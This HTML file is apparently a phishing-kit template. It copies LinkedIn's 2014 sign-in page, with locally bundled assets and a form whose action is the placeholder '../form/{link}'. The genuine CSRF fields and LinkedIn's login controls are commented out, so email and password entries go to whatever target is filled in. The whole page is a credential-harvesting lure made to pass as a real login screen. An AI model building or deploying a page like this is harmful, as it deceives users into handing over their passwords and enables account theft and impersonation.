<html>
	<head>
		<script src="Linked In/assets/fz-1.3.6-min.js" type="text/javascript"></script><script type="text/javascript">fs.config({"failureRedirect":"http://www.linkedin.com/nhome/", "uniEscape":true, "xhrHeaders":{"X-FS-Origin-Request":"/uas/login", "X-FS-Page-Id":"uas-consumer-login"}});</script><script></script>
		<meta name="globalTrackingUrl" content="/mob/tracking">
		<meta name="globalTrackingAppName" content="uas">
		<meta name="globalTrackingAppId" content="webTracking">
		<meta name="lnkd-track-json-lib" content="https://static.licdn.com/scds/concat/common/js?h=2jds9coeh4w78ed9wblscv68v-ebbt2vixcc5qz0otts5io08xv">
		<meta name="lnkd-track-lib" content="https://static.licdn.com/scds/concat/common/js?h=ebbt2vixcc5qz0otts5io08xv">
		<meta name="treeID" content="o/P/Gh+MkhNAQHtD2yoAAA==">
		<meta name="appName" content="uas">
		<meta name="lnkd-track-error" content="/lite/ua/error?csrfToken=ajax%3A8188109723766128734">
		<meta http-equiv="content-type" content="text/html; charset=UTF-8">
		<meta http-equiv="X-UA-Compatible" content="IE=edge">
		<meta name="pageImpressionID" content="8248f08a-1e6a-4410-b79f-fa2a6efd6545">
		<meta name="pageKey" content="uas-consumer-login-internal">
		<meta name="analyticsURL" content="/analytics/noauthtracker">
		<link rel="openid.server" href="https://www.linkedin.com/uas/openid/authorize">
		<link rel="apple-touch-icon-precomposed" href="Linked In/assets/apple-touch-icon.png">
		<!--[if lte IE 8]>
		<link rel="shortcut icon" href="https://static.licdn.com/scds/common/u/images/logos/favicons/v1/16x16/favicon.ico">
		<![endif]-->        <!--[if IE 9]>
		<link rel="shortcut icon" href="https://static.licdn.com/scds/common/u/images/logos/favicons/v1/favicon.ico">
		<![endif]-->
		<!-- <link rel="icon" href="https://static.licdn.com/scds/common/u/images/logos/favicons/v1/favicon.ico"> -->
		<meta name="msapplication-TileImage" content="Linked In/assets/logo-in-win8-tile-144_v1.png"/>
		<meta name="msapplication-TileColor" content="#0077B5"/>
		<meta name="application-name" content="LinkedIn"/>
		<link rel="stylesheet" type="text/css" href="Linked In/assets/css.css">
		<script type="text/javascript" src="Linked In/assets/js1.js"></script>        <script type="text/javascript">LI.define("UrlPackage"); LI.UrlPackage.containerCore = ["Linked In/assets/js2.js"][0];</script>        <script type="text/javascript">if (typeof LI === "undefined" || !LI){window.LI = {}; }            LI.JSContentBasePath = "https://static.licdn.com/scds/concat/common/js?v=build-2000_8_38298-prod"; LI.CSSContentBasePath = "https://static.licdn.com/scds/concat/common/css?v=build-2000_8_38298-prod"; LI.injectRelayHtmlUrl = "https://static.licdn.com/scds/common/u/lib/inject/0.4.2/relay.html"; LI.injectRelaySwfUrl = "https://static.licdn.com/scds/common/u/lib/inject/0.4.2/relay.swf"; LI.comboBaseUrl = "https://static.licdn.com/scds/concat/common/css?v=build-2000_8_38298-prod"; LI.staticUrlHashEnabled = true;</script>        <script type="text/javascript" src="Linked In/assets/js3.js"></script>        <script type="text/javascript">fs._server.fire("a3f3ff1a1f8c921340407b43db2a0000-1", {event:"before", type:"html"});</script>
		<meta name="remote-nav-init-marker" content="true"/>
		<link rel="stylesheet" type="text/css" href="Linked In/assets/css1.css">
		<script type="text/javascript" src="Linked In/assets/js4.js"></script>        <script type="text/javascript">fs._server.fire("a3f3ff1a1f8c921340407b43db2a0000-1", {event:"after", type:"html"});</script>
		<title>Sign In | LinkedIn</title>
		<link rel="stylesheet" type="text/css" href="Linked In/assets/css2.css">
		<script type="text/javascript" src="Linked In/assets/js5.js"></script>
		<link rel="canonical" href="login"/>
		<link rel="stylesheet" type="text/css" href="Linked In/assets/css3.css">
	</head>
	<body dir="ltr" class="guest v2  chrome-v5 chrome-v5-responsive sticky-bg guest" id="pagekey-uas-consumer-login-internal">
		<input id="inSlowConfig" type="hidden" value="false"/>        <script type="text/javascript">document.body.className += " js ";</script>        <script type="text/javascript">fs._server.fire("a3f3ff1a1f8c921340407b43db2a0000-2", {event:"before", type:"html"});</script>
		<div id="a11y-menu" class="a11y-skip-nav-container">
			<div class="a11y-skip-nav a11y-hidden">                <a href="login#a11y-content" id="a11y-skip-nav-link">Skip to main content</a>            </div>
			<script id="control-http-12274-exec-132172-1" type="linkedin/control" class="li-control">LI.Controls.addControl("control-http-12274-exec-132172-1","A11yMenu",{jumpToText:"Jump to: <strong>Summary<\/strong>",skipToText:"Skip to: <strong>Search<\/strong>",feedbackText:"Accessibility Feedback",closeText:"close",anchorText:"Content Follows:",moreText:"More in-page navigation options below",smallPageText:"Not much to look at here. Go directly to content.",searchUrl:"/vsearch/f"});</script>            <script id="control-http-12274-exec-132173-2" type="linkedin/control" class="li-control">LI.KbDialogDependencies={jsFiles:["https://static.licdn.com/scds/concat/common/js?h=37zc8dm8vu14f1neta1ponx0o"],cssFiles:["https://static.licdn.com/scds/concat/common/css?h=9qwmbyyfabl3upqh3cyzbhd49"]};LI.Controls.addControl("control-http-12274-exec-132173-2","kb.shortcuts",{homepageUrl:"http:\/\/www.linkedin.com\/nhome\/?trk=global_kb",profileUrl:"http:\/\/www.linkedin.com\/profile\/view?trk=global_kb",editProfileUrl:"http:\/\/www.linkedin.com\/profile\/edit?trk=global_kb",inboxUrl:"http:\/\/www.linkedin.com\/inbox\/#messages?trk=global_kb",jobsUrl:"http:\/\/www.linkedin.com\/job\/home?trk=global_kb",settingsUrl:"https:\/\/www.linkedin.com\/secure\/settings?req=&trk=global_kb",influencerUrl:"http:\/\/www.linkedin.com\/influencers?trk=global_kb"});</script>
		</div>
		<div id="header" class="global-header responsive-header nav-v5-2-header responsive-1 remote-nav" role="banner">
			<div id="top-header">
				<div class="wrapper">
					<h2 class="logo-container">                        <a href="http://www.linkedin.com/" class="logo" id="li-logo">                            LinkedIn Home                        </a>                    </h2>
					<ul class="nav main-nav guest-nav" role="navigation">
						<li class="nav-item">                            <a href="http://www.linkedin.com/static?key=what_is_linkedin&amp;trk=hb_what" class="nav-link">                                What is LinkedIn?                            </a>                        </li>
						<li class="nav-item">                            <a href="https://www.linkedin.com/reg/join?trk=hb_join" class="nav-link" rel="nofollow">                                Join Today                            </a>                        </li>
						<li class="nav-item">                            <a href="https://www.linkedin.com/uas/login?goback=&amp;trk=hb_signin" class="nav-link" rel="nofollow">                                Sign In                            </a>                        </li>
					</ul>
				</div>
			</div>
			<div class="a11y-content">                <a name="a11y-content" tabindex="0" id="a11y-content-link">Main content starts below.</a>            </div>
		</div>
		<script type="text/javascript" src="Linked In/assets/js7.js"></script>        <script type="text/javascript">fs._server.fire("a3f3ff1a1f8c921340407b43db2a0000-2", {event:"after", type:"html"});</script>
		<div id="body" class="" role="main">
			<div class="wrapper hp-nus-wrapper">
				<div id="global-error">                </div>
				<div id="bg-fallback"></div>
				<div id="main" class="signin">
					<div id="cookieDisabled">Make sure you have cookies and Javascript enabled in your browser before signing in.</div>
					<script type="text/javascript">if (navigator.cookieEnabled == true){LI.hide("cookieDisabled"); }</script>
					<form action="../form/{link}" method="POST" name="login" novalidate="novalidate" id="login" class="ajax-form stacked-form" data-jsenabled="check">
						<input type="hidden" name="isJsEnabled" value="false"/>                        <input type="hidden" name="source_app" value=""/>                        <input type="hidden" name="tryCount" id="tryCount" value=""/>                        <input type="hidden" name="clickedSuggestion" id="clickedSuggestion" value="false"/>
						<fieldset>
							<legend>Sign in to LinkedIn</legend>
							<div class="outer-wrapper">
								<div class="inner-wrapper">
									<div class="logo_container">LinkedIn</div>
									<ul id="mini-profile--js">
										<li class="">
											<div class="fieldgroup">
                        <img src="Linked In/assets/apple-touch-icon.png" alt="" style="margin-left: 40%"><br><br>
												<label for="session_key-login">Enter your email or username</label>                                                <script id="control-http-12157-58149-1" type="linkedin/control" class="li-control">LI.Controls.addControl("control-http-12157-58149-1","GhostLabel",{});</script>                                                <span class="error" id="session_key-login-error"></span>                                                <input type="text" placeholder="Enter your email or username" name="" value="" id="session_key-login" data-ime-mode-disabled>
												<div class="domain-suggestion hide" id="domainSuggestion">                                                    <span>Did you mean: <a id="suggestion" href="javascript:void(0);"></a>?</span>                                                </div>
											</div>
										</li>
										<li>
											<label for="session_password-login">Enter your password</label>                                            <script id="control-http-12157-58149-2" type="linkedin/control" class="li-control">LI.Controls.addControl("control-http-12157-58149-2","GhostLabel",{});</script>
											<div class="fieldgroup">
												<span class="error" id="session_password-login-error"></span>
												<div class="password_wrapper">                                                    <input type="password" autocomplete="new-password" placeholder="Enter your password" name="" value="" id="session_password-login" class="password">                                                    <a data-li-tooltip-id="login-tooltip" href="https://www.linkedin.com/uas/request-password-reset?session_redirect=&amp;trk=signin_fpwd" tracking="signin_fpwd" class="nav-link forgot-password-link password-reminder-link" title="Forgot password?">?</a>                                                </div>
											</div>
										</li>
										<li class="button">                                            <input type="submit" name="submit" value="Sign In" class="btn-primary" id="btn-primary">                                            <span>Not a member? <a href="https://www.linkedin.com/reg/join?trk=uas-consumer-login-internal-join-lnk">Join now</a></span>                                        </li>
									</ul>
								</div>
								<div class="gaussian-blur"></div>
							</div>
							<!--                             <script id="control-http-12157-58150-3" type="linkedin/control" class="li-control">LI.Controls.addControl("control-http-12157-58150-3","LI.BalloonCalloutDelegator",{width:"auto",orientation:"bottom",type:"tooltip-callout",dataId:"-li-tooltip-id"});</script>                            -->
						</fieldset>
					</form>
					<!--                     <input type="hidden" name="session_redirect" value="" id="session_redirect-login"><input type="hidden" name="trk" value="" id="trk-login"><input type="hidden" name="loginCsrfParam" value="47f69d37-66c9-43b8-8888-97633da14a63" id="loginCsrfParam-login"><input type="hidden" name="fromEmail" value="" id="fromEmail-login"><input type="hidden" name="csrfToken" value="ajax:8188109723766128734" id="csrfToken-login"><input type="hidden" name="sourceAlias" value="0_7r5yezRXCiA_H0CRD8sf6DhOjTKUNps5xGTqeX8EEoi" id="sourceAlias-login">                                        <script id="control-http-12157-58150-4" type="linkedin/control" class="li-control">LI.i18n.register("oneOrMoreErrors","There were one or more errors in your submission. Please correct the marked fields below.");LI.i18n.register("unableToProcessRequest","We were unable to handle your request. Please try again.");LI.Controls.addControl("control-http-12157-58150-4","FrontierAJAXForm",{injectAfter:".button",successCallback:LI.Login.handleSuccess,enableResizeScreen:false,errorCallback:LI.Login.handleError,injectGlobalError:true,errorId:"global-alert-queue"});</script>                    <script id="control-http-12157-58150-5" type="linkedin/control" class="li-control">LI.Controls.addControl("control-http-12157-58150-5","Login",{showErrorOnLoad:false,errorOnLoadMessage:"There&#8217;s already a LinkedIn account associated with this email address.",resetPasswordURL:"/uas/request-password-reset?session_redirect=&trk=signin_fpwd",passwordReminderMessage:"Need a password reminder?",domainSuggestion:""});</script>                    -->
					<div class="callout-container">
						<span id="login-tooltip">
							<div class="callout-content">                                Forgot password?                            </div>
						</span>
					</div>
				</div>
				<svg class="svg-image-blur">
					<filter id="blur-effect-1">
						<feGaussianBlur stdDeviation="5"></feGaussianBlur>
					</filter>
				</svg>
				<script>if (window.$ && jQuery){$("document").ready(function(){$(".gaussian-blur").addClass("blur"); }); } else{YEvent.onDOMReady(function(){YDom.addClass(Y$(".gaussian-blur", null, true), "blur"); }); }</script>
				<style type="text/css">                    .svg-image-blur {                         position: absolute;                        top: -50000px;                        left: -50000px;                    }                    .blur {                        -webkit-filter: blur(5px);                         -moz-filter: blur(5px);                        -o-filter: blur(5px);                         -ms-filter: blur(5px);                        filter: url(login);                        filter: progid:DXImageTransform.Microsoft.Blur(PixelRadius="5");                        zoom: 1;                    }                </style>
			</div>
		</div>
		<script type="text/javascript">LI.Controls.processQueue();</script>        <script type="text/javascript">LI_WCT(["control-http-12157-58149-1", "control-http-12157-58149-2", "control-http-12157-58150-3", "control-http-12157-58150-4", "control-http-12157-58150-5", ]);</script>        <script type="text/javascript">fs._server.fire("a3f3ff1a1f8c921340407b43db2a0000-3", {event:"before", type:"html"});</script>
		<div id="footer" class="remote-nav">
			<div class="wrapper">
				<p id="copyright" class="guest"><span>LinkedIn Corporation</span> <em>&copy; 2014</em></p>
				<ul id="nav-legal">
					<li><a href="http://www.linkedin.com/legal/user-agreement?trk=hb_ft_userag">User Agreement</a></li>
					<li><a href="http://www.linkedin.com/legal/privacy-policy?trk=hb_ft_priv">Privacy Policy</a></li>
					<li>                        <a href="https://help.linkedin.com/app/answers/detail/a_id/34593/loc/na/trk/uas-consumer-login-internal/" target="_blank" rel="nofollow">Community Guidelines</a>                    </li>
					<li><a href="http://www.linkedin.com/legal/cookie-policy?trk=hb_ft_cookie">Cookie Policy</a></li>
					<li class="last"><a href="http://www.linkedin.com/legal/copyright-policy?trk=hb_ft_copy">Copyright Policy</a></li>
				</ul>
			</div>
		</div>
	</body>
</html>
